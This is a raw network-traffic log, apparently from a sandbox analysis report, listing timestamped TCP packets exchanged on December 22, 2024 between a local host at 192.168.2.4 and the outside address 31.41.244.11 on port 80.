                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.393435001 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.396383047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.396433115 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.396718025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.396764994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.398263931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.398283005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.398312092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.398330927 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.400387049 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.400445938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.400549889 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.400598049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.402738094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.402789116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.402914047 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.402956009 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.405033112 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.405055046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.405093908 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.405112028 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.407244921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.407289982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.407402039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.407442093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.409564972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.409606934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.409734011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.409774065 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.411865950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.411906004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.412026882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.412065029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.414189100 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.414222002 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.414225101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.414261103 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.416404963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.416421890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.416466951 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.416488886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.418483019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.418545961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.418689013 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.418729067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.421042919 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.421067953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.421092033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.421106100 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.423286915 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.423332930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.423357964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.423402071 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.425509930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.425558090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.425676107 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.425714970 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.427639961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.427660942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.427686930 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.427706957 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.429776907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.429822922 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.429871082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.429913998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.431778908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.431833982 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.431838989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.431875944 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.434025049 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.434067965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.434118032 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.434159040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.436290979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.436351061 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.436476946 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.436541080 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.438536882 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.438585043 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.438641071 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.438683033 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.440841913 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.440892935 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.440931082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.440977097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.443108082 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.443156004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.443202019 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.443244934 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.445373058 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.445420980 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.445497990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.445538998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.447799921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.447818041 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.447841883 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.447865009 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.449934959 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.449976921 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.450026989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.450066090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.452478886 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.452497005 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.452542067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.452563047 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.454677105 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.454694033 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.454727888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.454742908 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.456789017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.456839085 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.456887007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.456934929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.459127903 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.459201097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.459361076 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.459408998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.461338997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.461386919 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.461415052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.461461067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.463718891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.463737011 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.463761091 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.463787079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.465878963 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.465924025 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.466001034 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.466046095 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.468154907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.468203068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.468368053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.468406916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.470428944 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.470474005 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.470557928 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.470597029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.472774982 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.472819090 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.472855091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.472892046 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.475003958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.475052118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.475327015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.475363016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.477277040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.477319002 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.477370977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.477407932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.479562998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.479607105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.479660988 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.479703903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.481816053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.481885910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.481925964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.481964111 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.484215975 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.484255075 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.484308004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.484347105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.486404896 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.486454964 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.486481905 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.486524105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.488672972 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.488723040 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.488795042 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.488842010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.581634998 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.581655025 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.581757069 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.582144976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.582192898 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.582288027 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.582336903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.584208965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.584225893 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.584268093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.584285975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.585747004 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.585788012 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.585812092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.585827112 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.587744951 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.587783098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.587790966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.587821960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.589633942 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.589674950 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.589799881 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.589843988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.591609955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.591660023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.591788054 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.591836929 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.592979908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.592997074 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.593019962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.593036890 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.594779015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.594841003 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.594851017 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.594897032 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.596611977 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.596659899 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.596718073 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.596760988 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.598396063 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.598439932 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.598531961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.598572969 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602067947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602091074 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602113962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602143049 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602665901 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602710009 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602830887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.602876902 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.604404926 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.604475975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.604587078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.604631901 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.605567932 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.605612993 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.605657101 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.605695963 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608340979 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608392000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608407021 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608447075 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608941078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.608994007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.609076023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.609116077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.610671997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.610713959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.610801935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.610845089 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.612350941 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.612395048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.612435102 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.612471104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.613993883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.614036083 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.614145994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.614188910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.615772009 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.615792990 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.615911007 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.617305994 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.617352962 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.617399931 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.617440939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.619060993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.619077921 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.619107008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.619139910 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.620650053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.620692968 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.620747089 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.620807886 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624370098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624407053 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624418974 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624447107 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624479055 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624543905 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624555111 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.624583960 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:29.626410007 CET804980431.41.244.11192.168.2.4
